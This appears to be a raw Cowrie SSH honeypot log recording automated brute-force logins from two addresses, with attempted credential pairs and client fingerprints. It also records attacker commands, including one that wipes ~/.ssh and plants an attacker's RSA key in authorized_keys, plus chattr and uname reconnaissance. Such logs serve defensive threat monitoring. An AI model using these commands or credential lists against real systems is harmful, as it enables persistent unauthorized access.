{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33840,"dst_ip":"1.2.3.4","dst_port":22,"session":"af4e1d708e22","protocol":"ssh","message":"New connection: 212.227.125.160:33840 (1.2.3.4:22) [session: af4e1d708e22]","sensor":"my-vps","timestamp":"2025-08-31T00:58:45.428925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:58:45.429680Z","src_ip":"212.227.125.160","session":"af4e1d708e22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:58:45.504256Z","src_ip":"212.227.125.160","session":"af4e1d708e22"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:45.728400Z","src_ip":"212.227.125.160","session":"af4e1d708e22"}
{"eventid":"cowrie.login.failed","username":"debian","password":"12345678","message":"login attempt [debian/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:46.829237Z","src_ip":"212.227.235.229","session":"06ebb1292291"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:46.862614Z","src_ip":"212.227.125.160","session":"af4e1d708e22"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:48.751620Z","src_ip":"212.227.235.229","session":"06ebb1292291"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54486,"dst_ip":"1.2.3.4","dst_port":22,"session":"f77196bccc7b","protocol":"ssh","message":"New connection: 212.227.235.229:54486 (1.2.3.4:22) [session: f77196bccc7b]","sensor":"my-vps","timestamp":"2025-08-31T00:58:49.764912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:58:49.765994Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:58:49.833468Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.login.success","username":"root","password":"77777","message":"login attempt [root/77777] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.142838Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:58:50.297213Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.297982Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.299027Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.368087Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:58:50.563532Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.564362Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.633913Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.634864Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54786,"dst_ip":"1.2.3.4","dst_port":22,"session":"a615b444396c","protocol":"ssh","message":"New connection: 212.227.235.229:54786 (1.2.3.4:22) [session: a615b444396c]","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.699903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.700544Z","src_ip":"212.227.235.229","session":"a615b444396c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:58:50.771512Z","src_ip":"212.227.235.229","session":"a615b444396c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:51.084344Z","src_ip":"212.227.235.229","session":"a615b444396c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:52.153086Z","src_ip":"212.227.235.229","session":"a615b444396c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55440,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd655911d3b","protocol":"ssh","message":"New connection: 212.227.235.229:55440 (1.2.3.4:22) [session: 9cd655911d3b]","sensor":"my-vps","timestamp":"2025-08-31T00:58:52.218813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:58:52.219795Z","src_ip":"212.227.235.229","session":"9cd655911d3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:58:52.287441Z","src_ip":"212.227.235.229","session":"9cd655911d3b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:58:52.596661Z","src_ip":"212.227.235.229","session":"9cd655911d3b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:52.664841Z","src_ip":"212.227.235.229","session":"f77196bccc7b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:52.666168Z","src_ip":"212.227.235.229","session":"9cd655911d3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57234,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5dea63eebb8","protocol":"ssh","message":"New connection: 212.227.235.229:57234 (1.2.3.4:22) [session: d5dea63eebb8]","sensor":"my-vps","timestamp":"2025-08-31T00:58:53.478076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:58:53.482758Z","src_ip":"212.227.235.229","session":"d5dea63eebb8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:58:53.718614Z","src_ip":"212.227.235.229","session":"d5dea63eebb8"}
{"eventid":"cowrie.login.failed","username":"1p","password":"18atcskd2w","message":"login attempt [1p/18atcskd2w] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:54.671471Z","src_ip":"212.227.235.229","session":"d5dea63eebb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51808,"dst_ip":"1.2.3.4","dst_port":22,"session":"24102ea16ce5","protocol":"ssh","message":"New connection: 212.227.125.160:51808 (1.2.3.4:22) [session: 24102ea16ce5]","sensor":"my-vps","timestamp":"2025-08-31T00:58:55.824197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:58:55.824915Z","src_ip":"212.227.125.160","session":"24102ea16ce5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:58:55.899604Z","src_ip":"212.227.125.160","session":"24102ea16ce5"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:55.913006Z","src_ip":"212.227.235.229","session":"d5dea63eebb8"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:56.177309Z","src_ip":"212.227.125.160","session":"24102ea16ce5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:57.317278Z","src_ip":"212.227.125.160","session":"24102ea16ce5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58108,"dst_ip":"1.2.3.4","dst_port":22,"session":"87646b2a3a6b","protocol":"ssh","message":"New connection: 212.227.125.160:58108 (1.2.3.4:22) [session: 87646b2a3a6b]","sensor":"my-vps","timestamp":"2025-08-31T00:59:02.195118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:02.264941Z","src_ip":"212.227.125.160","session":"87646b2a3a6b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:59:02.265766Z","src_ip":"212.227.125.160","session":"87646b2a3a6b"}
{"eventid":"cowrie.login.failed","username":"debian","password":"12345678","message":"login attempt [debian/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:59:03.046051Z","src_ip":"212.227.125.160","session":"87646b2a3a6b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:04.506873Z","src_ip":"212.227.125.160","session":"87646b2a3a6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51806,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c21ebe88b8b","protocol":"ssh","message":"New connection: 212.227.125.160:51806 (1.2.3.4:22) [session: 0c21ebe88b8b]","sensor":"my-vps","timestamp":"2025-08-31T00:59:06.259892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:06.260935Z","src_ip":"212.227.125.160","session":"0c21ebe88b8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:59:06.334572Z","src_ip":"212.227.125.160","session":"0c21ebe88b8b"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:59:06.556265Z","src_ip":"212.227.125.160","session":"0c21ebe88b8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:59:07.336970Z","src_ip":"212.227.125.160","session":"0c21ebe88b8b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:59:07.337798Z","src_ip":"212.227.125.160","session":"0c21ebe88b8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:07.422517Z","src_ip":"212.227.125.160","session":"0c21ebe88b8b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:07.423756Z","src_ip":"212.227.125.160","session":"0c21ebe88b8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58016,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b845ed41c6b","protocol":"ssh","message":"New connection: 212.227.125.160:58016 (1.2.3.4:22) [session: 4b845ed41c6b]","sensor":"my-vps","timestamp":"2025-08-31T00:59:16.682723Z"}
